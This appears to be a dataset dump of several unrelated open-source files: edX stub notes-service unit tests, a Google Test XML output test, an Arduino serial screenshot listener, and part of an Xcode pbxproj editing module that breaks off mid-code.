""" Unit tests for stub EdxNotes implementation. """ import urlparse import json import unittest import requests from uuid import uuid4 from ..edxnotes import StubEdxNotesService class StubEdxNotesServiceTest(unittest.TestCase): """ Test cases for the stub EdxNotes service. """ def setUp(self): """ Start the stub server. """ super(StubEdxNotesServiceTest, self).setUp() self.server = StubEdxNotesService() dummy_notes = self._get_dummy_notes(count=5) self.server.add_notes(dummy_notes) self.addCleanup(self.server.shutdown) def _get_dummy_notes(self, count=1): """ Returns a list of dummy notes. """ return [self._get_dummy_note() for i in xrange(count)] # pylint: disable=unused-variable def _get_dummy_note(self): """ Returns a single dummy note. """ nid = uuid4().hex return { "id": nid, "created": "2014-10-31T10:05:00.000000", "updated": "2014-10-31T10:50:00.101010", "user": "dummy-user-id", "usage_id": "dummy-usage-id", "course_id": "dummy-course-id", "text": "dummy note text " + nid, "quote": "dummy note quote", "ranges": [ { "start": "/p[1]", "end": "/p[1]", "startOffset": 0, "endOffset": 10, } ], } def test_note_create(self): dummy_note = { "user": "dummy-user-id", "usage_id": "dummy-usage-id", "course_id": "dummy-course-id", "text": "dummy note text", "quote": "dummy note quote", "ranges": [ { "start": "/p[1]", "end": "/p[1]", "startOffset": 0, "endOffset": 10, } ], } response = requests.post(self._get_url("api/v1/annotations"), data=json.dumps(dummy_note)) self.assertTrue(response.ok) response_content = response.json() self.assertIn("id", response_content) self.assertIn("created", response_content) self.assertIn("updated", response_content) self.assertIn("annotator_schema_version", response_content) self.assertDictContainsSubset(dummy_note, response_content) def test_note_read(self): notes = self._get_notes() for note in notes: response = requests.get(self._get_url("api/v1/annotations/" + note["id"])) self.assertTrue(response.ok) self.assertDictEqual(note, response.json()) response = requests.get(self._get_url("api/v1/annotations/does_not_exist")) self.assertEqual(response.status_code, 404) def test_note_update(self): notes = self._get_notes() for note in notes: response = requests.get(self._get_url("api/v1/annotations/" + note["id"])) self.assertTrue(response.ok) self.assertDictEqual(note, response.json()) response = requests.get(self._get_url("api/v1/annotations/does_not_exist")) self.assertEqual(response.status_code, 404) def test_search(self): # Without user response = requests.get(self._get_url("api/v1/search")) self.assertEqual(response.status_code, 400) # get response with default page and page size response = requests.get(self._get_url("api/v1/search"), params={ "user": "dummy-user-id", "usage_id": "dummy-usage-id", "course_id": "dummy-course-id", }) self.assertTrue(response.ok) self._verify_pagination_info( response=response.json(), total_notes=5, num_pages=3, notes_per_page=2, start=0, current_page=1, next_page=2, previous_page=None ) # search notes with text that don't exist response = requests.get(self._get_url("api/v1/search"), params={ "user": "dummy-user-id", "usage_id": "dummy-usage-id", "course_id": "dummy-course-id", "text": "world war 2" }) self.assertTrue(response.ok) self._verify_pagination_info( response=response.json(), total_notes=0, num_pages=0, notes_per_page=0, start=0, current_page=1, next_page=None, previous_page=None ) def test_delete(self): notes = self._get_notes() response = requests.delete(self._get_url("api/v1/annotations/does_not_exist")) self.assertEqual(response.status_code, 404) for note in notes: response = requests.delete(self._get_url("api/v1/annotations/" + note["id"])) self.assertEqual(response.status_code, 204) remaining_notes = self.server.get_all_notes() self.assertNotIn(note["id"], [note["id"] for note in remaining_notes]) self.assertEqual(len(remaining_notes), 0) def test_update(self): note = self._get_notes()[0] response = requests.put(self._get_url("api/v1/annotations/" + note["id"]), data=json.dumps({ "text": "new test text" })) self.assertEqual(response.status_code, 200) updated_note = self._get_notes()[0] self.assertEqual("new test text", updated_note["text"]) self.assertEqual(note["id"], updated_note["id"]) self.assertItemsEqual(note, updated_note) response = requests.get(self._get_url("api/v1/annotations/does_not_exist")) self.assertEqual(response.status_code, 404) # pylint: disable=too-many-arguments def _verify_pagination_info( self, response, total_notes, num_pages, notes_per_page, current_page, previous_page, next_page, start ): """ Verify the pagination information. Argument: response: response from api total_notes: total notes in the response num_pages: total number of pages in response notes_per_page: number of notes in the response current_page: current page number previous_page: previous page number next_page: next page number start: start of the current page """ def get_page_value(url): """ Return page value extracted from url. """ if url is None: return None parsed = urlparse.urlparse(url) query_params = urlparse.parse_qs(parsed.query) page = query_params["page"][0] return page if page is None else int(page) self.assertEqual(response["total"], total_notes) self.assertEqual(response["num_pages"], num_pages) self.assertEqual(len(response["rows"]), notes_per_page) self.assertEqual(response["current_page"], current_page) self.assertEqual(get_page_value(response["previous"]), previous_page) self.assertEqual(get_page_value(response["next"]), next_page) self.assertEqual(response["start"], start) def test_notes_collection(self): """ Test paginated response of notes api """ # Without user response = requests.get(self._get_url("api/v1/annotations")) self.assertEqual(response.status_code, 400) # Without any pagination parameters response = requests.get(self._get_url("api/v1/annotations"), params={"user": "dummy-user-id"}) self.assertTrue(response.ok) self._verify_pagination_info( response=response.json(), total_notes=5, num_pages=3, notes_per_page=2, start=0, current_page=1, next_page=2, previous_page=None ) # With pagination parameters response = requests.get(self._get_url("api/v1/annotations"), params={ "user": "dummy-user-id", "page": 2, "page_size": 3 }) self.assertTrue(response.ok) self._verify_pagination_info( response=response.json(), total_notes=5, num_pages=2, notes_per_page=2, start=3, current_page=2, next_page=None, previous_page=1 ) def test_notes_collection_next_previous_with_one_page(self): """ Test next and previous urls of paginated response of notes api when number of pages are 1 """ response = requests.get(self._get_url("api/v1/annotations"), params={ "user": "dummy-user-id", "page_size": 10 }) self.assertTrue(response.ok) self._verify_pagination_info( response=response.json(), total_notes=5, num_pages=1, notes_per_page=5, start=0, current_page=1, next_page=None, previous_page=None ) def test_notes_collection_when_no_notes(self): """ Test paginated response of notes api when there's no note present """ # Delete all notes self.test_cleanup() # Get default page response = requests.get(self._get_url("api/v1/annotations"), params={"user": "dummy-user-id"}) self.assertTrue(response.ok) self._verify_pagination_info( response=response.json(), total_notes=0, num_pages=0, notes_per_page=0, start=0, current_page=1, next_page=None, previous_page=None ) def test_cleanup(self): response = requests.put(self._get_url("cleanup")) self.assertTrue(response.ok) self.assertEqual(len(self.server.get_all_notes()), 0) def test_create_notes(self): dummy_notes = self._get_dummy_notes(count=2) response = requests.post(self._get_url("create_notes"), data=json.dumps(dummy_notes)) self.assertTrue(response.ok) self.assertEqual(len(self._get_notes()), 7) response = requests.post(self._get_url("create_notes")) self.assertEqual(response.status_code, 400) def test_headers(self): note = self._get_notes()[0] response = requests.get(self._get_url("api/v1/annotations/" + note["id"])) self.assertTrue(response.ok) self.assertEqual(response.headers.get("access-control-allow-origin"), "*") response = requests.options(self._get_url("api/v1/annotations/")) self.assertTrue(response.ok) self.assertEqual(response.headers.get("access-control-allow-origin"), "*") self.assertEqual(response.headers.get("access-control-allow-methods"), "GET, POST, PUT, DELETE, OPTIONS") self.assertIn("X-CSRFToken", response.headers.get("access-control-allow-headers")) def _get_notes(self): """ Return a list of notes from the stub EdxNotes service. """ notes = self.server.get_all_notes() self.assertGreater(len(notes), 0, "Notes are empty.") return notes def _get_url(self, path): """ Construt a URL to the stub EdxNotes service. """ return "http://127.0.0.1:{port}/{path}/".format( port=self.server.port, path=path )
agpl-3.0
Chilastra-Reborn/Chilastra-source-code
utils/gmock-1.6.0/gtest/test/gtest_xml_outfiles_test.py
718
5312
#!/usr/bin/env python # # Copyright 2008, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Unit test for the gtest_xml_output module.""" __author__ = "keith.ray@gmail.com (Keith Ray)" import os from xml.dom import minidom, Node import gtest_test_utils import gtest_xml_test_utils GTEST_OUTPUT_SUBDIR = "xml_outfiles" GTEST_OUTPUT_1_TEST = "gtest_xml_outfile1_test_" GTEST_OUTPUT_2_TEST = "gtest_xml_outfile2_test_" EXPECTED_XML_1 = """<?xml version="1.0" encoding="UTF-8"?> <testsuites tests="1" failures="0" disabled="0" errors="0" time="*" name="AllTests"> <testsuite name="PropertyOne" tests="1" failures="0" disabled="0" errors="0" time="*"> <testcase name="TestSomeProperties" status="run" time="*" classname="PropertyOne" SetUpProp="1" TestSomeProperty="1" TearDownProp="1" /> </testsuite> </testsuites> """ EXPECTED_XML_2 = """<?xml version="1.0" encoding="UTF-8"?> <testsuites tests="1" failures="0" disabled="0" errors="0" time="*" name="AllTests"> <testsuite name="PropertyTwo" tests="1" failures="0" disabled="0" errors="0" time="*"> <testcase name="TestSomeProperties" status="run" time="*" classname="PropertyTwo" SetUpProp="2" TestSomeProperty="2" TearDownProp="2" /> </testsuite> </testsuites> """ class GTestXMLOutFilesTest(gtest_xml_test_utils.GTestXMLTestCase): """Unit test for Google Test's XML output functionality.""" def setUp(self): # We want the trailing '/' that the last "" provides in os.path.join, for # telling Google Test to create an output directory instead of a single file # for xml output. self.output_dir_ = os.path.join(gtest_test_utils.GetTempDir(), GTEST_OUTPUT_SUBDIR, "") self.DeleteFilesAndDir() def tearDown(self): self.DeleteFilesAndDir() def DeleteFilesAndDir(self): try: os.remove(os.path.join(self.output_dir_, GTEST_OUTPUT_1_TEST + ".xml")) except os.error: pass try: os.remove(os.path.join(self.output_dir_, GTEST_OUTPUT_2_TEST + ".xml")) except os.error: pass try: os.rmdir(self.output_dir_) except os.error: pass def testOutfile1(self): self._TestOutFile(GTEST_OUTPUT_1_TEST, EXPECTED_XML_1) def testOutfile2(self): self._TestOutFile(GTEST_OUTPUT_2_TEST, EXPECTED_XML_2) def _TestOutFile(self, test_name, expected_xml): gtest_prog_path = gtest_test_utils.GetTestExecutablePath(test_name) command = [gtest_prog_path, "--gtest_output=xml:%s" % self.output_dir_] p = gtest_test_utils.Subprocess(command, working_dir=gtest_test_utils.GetTempDir()) self.assert_(p.exited) self.assertEquals(0, p.exit_code) # TODO(wan@google.com): libtool causes the built test binary to be # named lt-gtest_xml_outfiles_test_ instead of # gtest_xml_outfiles_test_. To account for this possibillity, we # allow both names in the following code. We should remove this # hack when Chandler Carruth's libtool replacement tool is ready. output_file_name1 = test_name + ".xml" output_file1 = os.path.join(self.output_dir_, output_file_name1) output_file_name2 = 'lt-' + output_file_name1 output_file2 = os.path.join(self.output_dir_, output_file_name2) self.assert_(os.path.isfile(output_file1) or os.path.isfile(output_file2), output_file1) expected = minidom.parseString(expected_xml) if os.path.isfile(output_file1): actual = minidom.parse(output_file1) else: actual = minidom.parse(output_file2) self.NormalizeXml(actual.documentElement) self.AssertEquivalentNodes(expected.documentElement, actual.documentElement) expected.unlink() actual.unlink() if __name__ == "__main__": os.environ["GTEST_STACK_TRACE_DEPTH"] = "0" gtest_test_utils.Main()
agpl-3.0
jamesbowman/gd2-lib
scripts/arduino_listener.py
1
4016
import os import sys import serial import struct import array import time import binascii def crc(s): # CRC-32 of string s return binascii.crc32(s) & 0xffffffff from PIL import Image, ImageChops def fetch8(pix, x, y, ser): difference = ord(ser.read(1)) if (difference & 1) == 0: assert 0, "difference is %02x\n" % difference for i in range(8): if (difference >> i) & 1: (b, g, r) = list(ser.read(3)) pix[x + i, y] = (r, g, b) if __name__ == '__main__': import sys, getopt try: optlist, args = getopt.getopt(sys.argv[1:], "vh:s:a:") except getopt.GetoptError as reason: print(reason) print print('usage: listenscreenshot.py [options]') print print sys.exit(1) optdict = dict(optlist) verbose = '-v' in optdict assetfile = optdict.get('-a', None) if '-s' in optdict: speed = int(optdict['-s']) else: speed = 1000000 port = optdict.get('-h', "/dev/ttyUSB0") if verbose: print('Opening %s at %d' % (port, speed)) ser = serial.Serial(port, speed) ser.setDTR(0) time.sleep(0.01) ser.setDTR(1) l = b'' ESCAPE = "%H%" log = open("log", "w") frame = 0 if 0: grid = Image.fromstring("L", (1280, 720), 360 * ( ((chr(255) + chr(240)) * 640) + ((chr(240) + chr(224)) * 640))).convert("RGB") try: if assetfile is not None: srcf = open(assetfile, "rb") totsize = os.path.getsize(assetfile) except IOError: srcf = None inputs = open("inputs") while True: s = ser.read(1) if s == b'\n': l = b'' else: l = (l + s)[-3:] if l == ESCAPE: print break chk = s[0] if (chk == 0xa4): print("[Synced]") ser.write(b"!") elif (chk == 0xa5): (w,h) = struct.unpack("HH", ser.read(4)) filename = "%06d.png" % frame sys.stdout.flush() im = Image.new("RGBA", (w, h)) pix = im.load() total = 0 t0 = time.time() ser.timeout = 0.5 for y in range(-2, h): sys.stdout.write("\rdumping %dx%d frame to %s [%-50s]" % (w, h, filename, ("#" * (50 * y // h )))) ser.write(b"!") (licrc, ) = struct.unpack("I", ser.read(4)) li = ser.read(4 * w) if licrc != crc(li): print("\nCRC mismatch line %d %08x %08x\n" % (y, licrc, crc(li))) strip = Image.frombytes("RGBA", (w, 1), li) im.paste(strip, (0, max(0, y))) # print('%.1f' % (time.time() - t0)) print(' %08x' % crc(im.tobytes())) ser.timeout = 0 (b,g,r,a) = im.split() im = Image.merge("RGB", (r, g, b)) if 1: im.save(filename) else: im = im.resize((im.size[0] * 2, im.size[1] * 2)) full = Image.new("RGB", (1280, 720)) full.paste(im, ((1280 - im.size[0]) / 2, (680 - im.size[1]) / 2)) ImageChops.multiply(grid, full).save(filename) frame += 1 elif False and (chk == 0xa6): d = srcf.read(0x30) print("\rtransfer ", "[" + ("#" * (72 * srcf.tell() / totsize)).ljust(72) + "]",) while len(d) & 3: d += chr(0) ser.write(chr(len(d)) + d) elif (chk == 0xa7): for line in inputs: if line.startswith("INPUTS "): break if not line.startswith("INPUTS "): sys.exit(0) for v in line.split()[1:]: ser.write(chr(int(v, 16))) else: # sys.stdout.write(s.decode('UTF-8')) print(s) sys.stdout.flush() # log.write(s.decode('UTF-8'))
bsd-3-clause
PodRepo/firefox-ios
scripts/mod_pbxproj.py
54
52734
# Copyright 2012 Calvin Rien # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # A pbxproj file is an OpenStep format plist # {} represents dictionary of key=value pairs delimited by ; # () represents list of values delimited by , # file starts with a comment specifying the character type # // !$*UTF8*$! # when adding a file to a project, create the PBXFileReference # add the PBXFileReference's guid to a group # create a PBXBuildFile with the PBXFileReference's guid # add the PBXBuildFile to the appropriate build phase # when adding a header search path add # HEADER_SEARCH_PATHS = "path/**"; # to each XCBuildConfiguration object # Xcode4 will read either a OpenStep or XML plist. # this script uses `plutil` to validate, read and write # the pbxproj file. Plutil is available in OS X 10.2 and higher # Plutil can't write OpenStep plists, so I save as XML import datetime import json import ntpath import os import plistlib import re import shutil import subprocess import uuid from UserDict import IterableUserDict from UserList import UserList regex = '[a-zA-Z0-9\\._/-]*' class PBXEncoder(json.JSONEncoder): def default(self, obj): """Tests the input object, obj, to encode as JSON.""" if isinstance(obj, (PBXList, PBXDict)): return obj.data return json.JSONEncoder.default(self, obj) class PBXDict(IterableUserDict): def __init__(self, d=None): if d: d = dict([(PBXType.Convert(k), PBXType.Convert(v)) for k, v in d.items()]) IterableUserDict.__init__(self, d) def __setitem__(self, key, value): IterableUserDict.__setitem__(self, PBXType.Convert(key), PBXType.Convert(value)) def remove(self, key): self.data.pop(PBXType.Convert(key), None) class PBXList(UserList): def __init__(self, l=None): if isinstance(l, basestring): UserList.__init__(self) self.add(l) return elif l: l = [PBXType.Convert(v) for v in l] UserList.__init__(self, l) def add(self, value): value = PBXType.Convert(value) if value in self.data: return False self.data.append(value) return True def remove(self, value): value = PBXType.Convert(value) if value in self.data: self.data.remove(value) return True return False def __setitem__(self, key, value): UserList.__setitem__(self, PBXType.Convert(key), PBXType.Convert(value)) class PBXType(PBXDict): def __init__(self, d=None): PBXDict.__init__(self, d) if 'isa' not in self: self['isa'] = self.__class__.__name__ self.id = None @staticmethod def Convert(o): if isinstance(o, list): return PBXList(o) elif isinstance(o, dict): isa = o.get('isa') if not isa: return PBXDict(o) cls = globals().get(isa) if cls and issubclass(cls, PBXType): return cls(o) print 'warning: unknown PBX type: %s' % isa return PBXDict(o) else: return o @staticmethod def IsGuid(o): return re.match('^[A-F0-9]{24}$', str(o)) @classmethod def GenerateId(cls): return ''.join(str(uuid.uuid4()).upper().split('-')[1:]) @classmethod def Create(cls, *args, **kwargs): return cls(*args, **kwargs) class PBXFileReference(PBXType): def __init__(self, d=None): PBXType.__init__(self, d) self.build_phase = None types = { '.a': ('archive.ar', 'PBXFrameworksBuildPhase'), '.app': ('wrapper.application', None), '.s': ('sourcecode.asm', 'PBXSourcesBuildPhase'), '.c': ('sourcecode.c.c', 'PBXSourcesBuildPhase'), '.cpp': ('sourcecode.cpp.cpp', 'PBXSourcesBuildPhase'), '.framework': ('wrapper.framework', 'PBXFrameworksBuildPhase'), '.h': ('sourcecode.c.h', None), '.hpp': ('sourcecode.c.h', None), '.swift': ('sourcecode.swift', 'PBXSourcesBuildPhase'), '.icns': ('image.icns', 'PBXResourcesBuildPhase'), '.m': ('sourcecode.c.objc', 'PBXSourcesBuildPhase'), '.j': ('sourcecode.c.objc', 'PBXSourcesBuildPhase'), '.mm': ('sourcecode.cpp.objcpp', 'PBXSourcesBuildPhase'), '.nib': ('wrapper.nib', 'PBXResourcesBuildPhase'), '.plist': ('text.plist.xml', 'PBXResourcesBuildPhase'), '.json': ('text.json', 'PBXResourcesBuildPhase'), '.png': ('image.png', 'PBXResourcesBuildPhase'), '.rtf': ('text.rtf', 'PBXResourcesBuildPhase'), '.tiff': ('image.tiff', 'PBXResourcesBuildPhase'), '.txt': ('text', 'PBXResourcesBuildPhase'), '.xcodeproj': ('wrapper.pb-project', None), '.xib': ('file.xib', 'PBXResourcesBuildPhase'), '.strings': ('text.plist.strings', 'PBXResourcesBuildPhase'), '.bundle': ('wrapper.plug-in', 'PBXResourcesBuildPhase'), '.dylib': ('compiled.mach-o.dylib', 'PBXFrameworksBuildPhase') } trees = [ '<absolute>', '<group>', 'BUILT_PRODUCTS_DIR', 'DEVELOPER_DIR', 'SDKROOT', 'SOURCE_ROOT', ] def guess_file_type(self, ignore_unknown_type=False): self.remove('explicitFileType') self.remove('lastKnownFileType') name = os.path.split(self.get('path'))[1] ext = os.path.splitext(name)[1] if os.path.isdir(self.get('path')) and ext != '.framework' and ext != '.bundle': f_type = 'folder' build_phase = None ext = '' else: f_type, build_phase = PBXFileReference.types.get(ext, ('?', 'PBXResourcesBuildPhase')) self['lastKnownFileType'] = f_type self.build_phase = build_phase if f_type == '?' and not ignore_unknown_type: print 'unknown file extension: %s' % ext print 'please add extension and Xcode type to PBXFileReference.types' return f_type def set_file_type(self, ft): self.remove('explicitFileType') self.remove('lastKnownFileType') self['explicitFileType'] = ft @classmethod def Create(cls, os_path, name=None, tree='SOURCE_ROOT', ignore_unknown_type=False): if tree not in cls.trees: print 'Not a valid sourceTree type: %s' % tree return None fr = cls() fr.id = cls.GenerateId() fr['path'] = os_path if name is None: fr['name'] = os.path.split(os_path)[1] else: fr['name'] = name fr['sourceTree'] = '<absolute>' if os.path.isabs(os_path) else tree fr.guess_file_type(ignore_unknown_type=ignore_unknown_type) return fr class PBXBuildFile(PBXType): def set_weak_link(self, weak=False): k_settings = 'settings' k_attributes = 'ATTRIBUTES' s = self.get(k_settings) if not s: if weak: self[k_settings] = PBXDict({k_attributes: PBXList(['Weak'])}) return True atr = s.get(k_attributes) if not atr: if weak: atr = PBXList() else: return False if weak: atr.add('Weak') else: atr.remove('Weak') self[k_settings][k_attributes] = atr return True def add_compiler_flag(self, flag): k_settings = 'settings' k_attributes = 'COMPILER_FLAGS' if k_settings not in self: self[k_settings] = PBXDict() if k_attributes not in self[k_settings]: self[k_settings][k_attributes] = flag return True flags = self[k_settings][k_attributes].split(' ') if flag in flags: return False flags.append(flag) self[k_settings][k_attributes] = ' '.join(flags) @classmethod def Create(cls, file_ref, weak=False): if isinstance(file_ref, PBXFileReference) or isinstance(file_ref, PBXVariantGroup): file_ref = file_ref.id bf = cls() bf.id = cls.GenerateId() bf['fileRef'] = file_ref if weak: bf.set_weak_link(True) return bf class PBXGroup(PBXType): def add_child(self, ref): if not isinstance(ref, PBXDict): return None isa = ref.get('isa') if isa != 'PBXFileReference' and isa != 'PBXGroup' and isa != 'PBXVariantGroup': return None if 'children' not in self: self['children'] = PBXList() self['children'].add(ref.id) return ref.id def remove_child(self, id): if 'children' not in self: self['children'] = PBXList() return if not PBXType.IsGuid(id): id = id.id self['children'].remove(id) def has_child(self, id): if 'children' not in self: self['children'] = PBXList() return False if not PBXType.IsGuid(id): id = id.id return id in self['children'] def get_name(self): path_name = os.path.split(self.get('path', ''))[1] return self.get('name', path_name) @classmethod def Create(cls, name, path=None, tree='SOURCE_ROOT'): grp = cls() grp.id = cls.GenerateId() grp['name'] = name grp['children'] = PBXList() if path: grp['path'] = path grp['sourceTree'] = tree else: grp['sourceTree'] = '<group>' return grp class PBXNativeTarget(PBXType): pass class PBXProject(PBXType): pass class PBXContainerItemProxy(PBXType): pass class PBXReferenceProxy(PBXType): pass class PBXVariantGroup(PBXType): def add_child(self, ref): if not isinstance(ref, PBXDict): return None isa = ref.get('isa') if isa != 'PBXFileReference': return None if 'children' not in self: self['children'] = PBXList() self['children'].add(ref.id) return ref.id def remove_child(self, id): if 'children' not in self: self['children'] = PBXList() return if not PBXType.IsGuid(id): id = id.id self['children'].remove(id) def has_child(self, id): if 'children' not in self: self['children'] = PBXList() return False if not PBXType.IsGuid(id): id = id.id return id in self['children'] @classmethod def Create(cls, name, path=None, tree='SOURCE_ROOT'): grp = cls() grp.id = cls.GenerateId() grp['name'] = name grp['children'] = PBXList() if path: grp['path'] = path grp['sourceTree'] = tree else: grp['sourceTree'] = '<group>' return grp class PBXTargetDependency(PBXType): pass class PBXAggregateTarget(PBXType): pass class PBXHeadersBuildPhase(PBXType): pass class PBXBuildPhase(PBXType): def add_build_file(self, bf): if bf.get('isa') != 'PBXBuildFile': return False if 'files' not in self: self['files'] = PBXList() self['files'].add(bf.id) return True def remove_build_file(self, id): if 'files' not in self: self['files'] = PBXList() return self['files'].remove(id) def has_build_file(self, id): if 'files' not in self: self['files'] = PBXList() return False if not PBXType.IsGuid(id): id = id.id return id in self['files'] class PBXFrameworksBuildPhase(PBXBuildPhase): pass class PBXResourcesBuildPhase(PBXBuildPhase): pass class PBXShellScriptBuildPhase(PBXBuildPhase): @classmethod def Create(cls, script, shell="/bin/sh", files=[], input_paths=[], output_paths=[], show_in_log = '0'): bf = cls() bf.id = cls.GenerateId() bf['files'] = files bf['inputPaths'] = input_paths bf['outputPaths'] = output_paths bf['runOnlyForDeploymentPostprocessing'] = '0'; bf['shellPath'] = shell bf['shellScript'] = script bf['showEnvVarsInLog'] = show_in_log return bf class PBXSourcesBuildPhase(PBXBuildPhase): pass class PBXCopyFilesBuildPhase(PBXBuildPhase): pass class XCBuildConfiguration(PBXType): def add_search_paths(self, paths, base, key, recursive=True, escape=True): modified = False if not isinstance(paths, list): paths = [paths] if base not in self: self[base] = PBXDict() for path in paths: if recursive and not path.endswith('/**'): path = os.path.join(path, '**') if key not in self[base]: self[base][key] = PBXList() elif isinstance(self[base][key], basestring): self[base][key] = PBXList(self[base][key]) if escape: if self[base][key].add('"%s"' % path): # '\\"%s\\"' % path modified = True else: if self[base][key].add(path): # '\\"%s\\"' % path modified = True return modified def add_header_search_paths(self, paths, recursive=True): return self.add_search_paths(paths, 'buildSettings', 'HEADER_SEARCH_PATHS', recursive=recursive) def add_library_search_paths(self, paths, recursive=True): return self.add_search_paths(paths, 'buildSettings', 'LIBRARY_SEARCH_PATHS', recursive=recursive) def add_framework_search_paths(self, paths, recursive=True): return self.add_search_paths(paths, 'buildSettings', 'FRAMEWORK_SEARCH_PATHS', recursive=recursive) def add_other_cflags(self, flags): return self.add_flag('OTHER_CFLAGS', flags) def add_other_ldflags(self, flags): return self.add_flag('OTHER_LDFLAGS', flags) def add_flag(self, key, flags): modified = False base = 'buildSettings' if isinstance(flags, basestring): flags = PBXList(flags) if base not in self: self[base] = PBXDict() for flag in flags: if key not in self[base]: self[base][key] = PBXList() elif isinstance(self[base][key], basestring): self[base][key] = PBXList(self[base][key]) if self[base][key].add(flag): self[base][key] = [e for e in self[base][key] if e] modified = True return modified def remove_flag(self, key, flags): modified = False base = 'buildSettings' if isinstance(flags, basestring): flags = PBXList(flags) if base in self: # there are flags, so we can "remove" something for flag in flags: if key not in self[base]: return False elif isinstance(self[base][key], basestring): self[base][key] = PBXList(self[base][key]) if self[base][key].remove(flag): self[base][key] = [e for e in self[base][key] if e] modified = True if len(self[base][key]) == 0: self[base].pop(key, None) return modified def remove_other_ldflags(self, flags): return self.remove_flag('OTHER_LD_FLAGS', flags) class XCConfigurationList(PBXType): pass class XcodeProject(PBXDict): plutil_path = 'plutil' special_folders = ['.bundle', '.framework', '.xcodeproj'] def __init__(self, d=None, path=None): if not path: path = os.path.join(os.getcwd(), 'project.pbxproj') self.pbxproj_path = os.path.abspath(path) self.source_root = os.path.abspath(os.path.join(os.path.split(path)[0], '..')) IterableUserDict.__init__(self, d) self.data = PBXDict(self.data) self.objects = self.get('objects') self.modified = False root_id = self.get('rootObject') if root_id: self.root_object = self.objects[root_id] root_group_id = self.root_object.get('mainGroup') self.root_group = self.objects[root_group_id] else: print "error: project has no root object" self.root_object = None self.root_group = None for k, v in self.objects.iteritems(): v.id = k def add_other_cflags(self, flags): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] for b in build_configs: if b.add_other_cflags(flags): self.modified = True def add_other_ldflags(self, flags): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] for b in build_configs: if b.add_other_ldflags(flags): self.modified = True def remove_other_ldflags(self, flags): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] for b in build_configs: if b.remove_other_ldflags(flags): self.modified = True def add_header_search_paths(self, paths, recursive=True): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] for b in build_configs: if b.add_header_search_paths(paths, recursive): self.modified = True def add_framework_search_paths(self, paths, recursive=True): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] for b in build_configs: if b.add_framework_search_paths(paths, recursive): self.modified = True def add_library_search_paths(self, paths, recursive=True): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] for b in build_configs: if b.add_library_search_paths(paths, recursive): self.modified = True def add_flags(self, pairs, configuration='All'): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] # iterate over all the pairs of configurations for b in build_configs: if configuration != "All" and b.get('name') != configuration : continue for k in pairs: if b.add_flag(k, pairs[k]): self.modified = True def remove_flags(self, pairs, configuration='All'): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] # iterate over all the pairs of configurations for b in build_configs: if configuration != "All" and b.get('name') != configuration : continue for k in pairs: if b.remove_flag(k, pairs[k]): self.modified = True def get_obj(self, id): return self.objects.get(id) def get_ids(self): return self.objects.keys() def get_files_by_os_path(self, os_path, tree='SOURCE_ROOT'): files = [f for f in self.objects.values() if f.get('isa') == 'PBXFileReference' and f.get('path') == os_path and f.get('sourceTree') == tree] return files def get_files_by_name(self, name, parent=None): if parent: files = [f for f in self.objects.values() if f.get('isa') == 'PBXFileReference' and f.get('name') == name and parent.has_child(f)] else: files = [f for f in self.objects.values() if f.get('isa') == 'PBXFileReference' and f.get('name') == name] return files def get_build_files(self, id): files = [f for f in self.objects.values() if f.get('isa') == 'PBXBuildFile' and f.get('fileRef') == id] return files def get_groups_by_name(self, name, parent=None): if parent: groups = [g for g in self.objects.values() if g.get('isa') == 'PBXGroup' and g.get_name() == name and parent.has_child(g)] else: groups = [g for g in self.objects.values() if g.get('isa') == 'PBXGroup' and g.get_name() == name] return groups def get_or_create_group(self, name, path=None, parent=None): if not name: return None if not parent: parent = self.root_group elif not isinstance(parent, PBXGroup): # assume it's an id parent = self.objects.get(parent, self.root_group) groups = self.get_groups_by_name(name) for grp in groups: if parent.has_child(grp.id): return grp grp = PBXGroup.Create(name, path) parent.add_child(grp) self.objects[grp.id] = grp self.modified = True return grp def get_groups_by_os_path(self, path): path = os.path.abspath(path) groups = [g for g in self.objects.values() if g.get('isa') == 'PBXGroup' and os.path.abspath(g.get('path', '/dev/null')) == path] return groups def get_build_phases(self, phase_name): phases = [p for p in self.objects.values() if p.get('isa') == phase_name] return phases def get_relative_path(self, os_path): return os.path.relpath(os_path, self.source_root) def verify_files(self, file_list, parent=None): # returns list of files not in the current project. if not file_list: return [] if parent: exists_list = [f.get('name') for f in self.objects.values() if f.get('isa') 